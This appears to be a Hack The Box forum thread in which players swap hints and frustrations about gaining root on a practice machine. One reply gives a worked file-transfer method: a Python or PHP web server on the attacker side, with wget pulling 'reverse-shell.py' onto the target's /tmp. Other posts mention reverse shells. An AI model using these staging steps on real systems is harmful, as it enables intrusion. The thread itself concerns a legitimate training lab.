Finally got this after having a decent discussion with one of our fellow htb members. I was looking in the right places, but totally missed the importance of some vital information I had been staring at for days.
Anyway, rather than enumerate harder, I would say look at the information you have enumerated in more detail. Some of the scripts I ran didn’t directly add to my pool of information, but they definitely pointed to an implication and to something that I had previously discarded as a possibility.
I’d love to help, but since this was one of my first machines, I didn’t take good notes and lost what I did have. I remember how I exploited root, but I forgot how I got to break out of www-data privs…re-exploiting to see if I can figure it out.
Sure, actually breaking in to that system was the easiest thing i have ever seen but getting root really confuses me. anyway thanks for checking it for me.
@stormworm29 said:
Sure, actually breaking in to that system was the easiest thing i have ever seen but getting root really confuses me. anyway thanks for checking it for me.
If you have anything besides www-data, PM and I can explain past there
I’ve been struggling with getting root priv for the last 24 hours. I think I’m on the right path with using the sudo command to access certain directories but I have no idea how to get a read on root.txt when I require root to begin with. I also don’t know how to upload files that everyone else seems to be doing. I’ve tried my own research for hours on Linux permissions and directory commands but to no avail. I’m just looking to get steered in the right direction. Thanks
@BigEars said:
I’ve been struggling with getting root priv for the last 24 hours. I think I’m on the right path with using the sudo command to access certain directories but I have no idea how to get a read on root.txt when I require root to begin with. I also don’t know how to upload files that everyone else seems to be doing. I’ve tried my own research for hours on Linux permissions and directory commands but to no avail. I’m just looking to get steered in the right direction. Thanks
wget is your friend. Just host your own server like python -m SimpleHTTPServer 8080 and request the file from your shell.
I got the server up and running but it’s hosted locally instead of on my VPN. I’m having trouble getting it to work with wget while on the ww-data shell so that i can download files. Is there a workaround for this? Is the use of a local server required for this machine before i go down a rabbit hole?
As for that certain directory, all i can see is a single python script and a test file. I cannot run the python script but i can view the contents of the test file without opening it. Am i overlooking anything aside from these file? Trying really hard to avoid giving too much away.
Much appreciation for all of your help. I’m frustrated but having fun.
Yaay, finally got root. Why it worked is a mystery to me. Can anyone spare two minutes and explain why my solution worked? I’ll DM solution and question
@BigEars you need to set up a small HTTP server in Kali. You can use PHP or Python. I normally use PHP.
In the Kali terminal you go to the folder where you placed the file you need transferred to the server you are trying to hack. Maybe you have a file named ‘reverse-shell.py’ in ‘/root/Machines/Bashed/www’ so you cd to that folder. Then you type ‘php -S 10.10.XXX.XXX:8080’ (change the IP to the IP you get via VPN).
You download the file on the machine you are trying to hack using wget or curl. Use wget like this:
‘wget http://10.10.XXX.XXX:8080/reverse-shell.py -O /tmp’. This will download the file to /tmp the folder. If you omit -O it will download to the folder where you run the command.
@dirneboi Thanks for the tips., I was actually able to get the wget command to work almost immediately after my last post. I think the box was restarting when i tried downloading the file at http://10.10.XXX.XXX:8080/myscript.py so I thought i was doing something wrong when it didn’t work.
I feel so close to getting the key but I keep getting permissions denied whenever i try to run commands or python scripts that involve the root.txt file. At this point I’m not sure if my scripts are bad or if I’m missing something else involving permissions. I can’t believe this has taken me several days and is one of the easiest boxes. Definitely hurts the self-esteem haha.
Day 8 and I still have not gotten root.txt. Not sure what else to try at this point. I know which directory I’m supposed to interact with using scriptmanager but I can’t see how it can possibly help me with root.txt considering that I cannot interact with the root folder at all without getting a permission denied error.
Same here…for days I‘m trying to get root. I am the other user, I alter the script to try to access the root.txt but this user has no permission to access the root folder.
I know the user is special, I can create a reverse shell bash as the other user, can alter his script but still don‘t know what to do to get the root File. I suck at this
@CaptnCrash said:
Same here…for days I‘m trying to get root. I am the other user, I alter the script to try to access the root.txt but this user has no permission to access the root folder.
I know the user is special, I can create a reverse shell bash as the other user, can alter his script but still don‘t know what to do to get the root File. I suck at this
Not sure where to post, but I’m stuck as well at getting root. Noob here. I got a reverse shell more or less fully interactive, I got into the famous directory but no idea of how to use a script to get /root.txt where I have zero permissions on. Anyone keen to help me in PM?
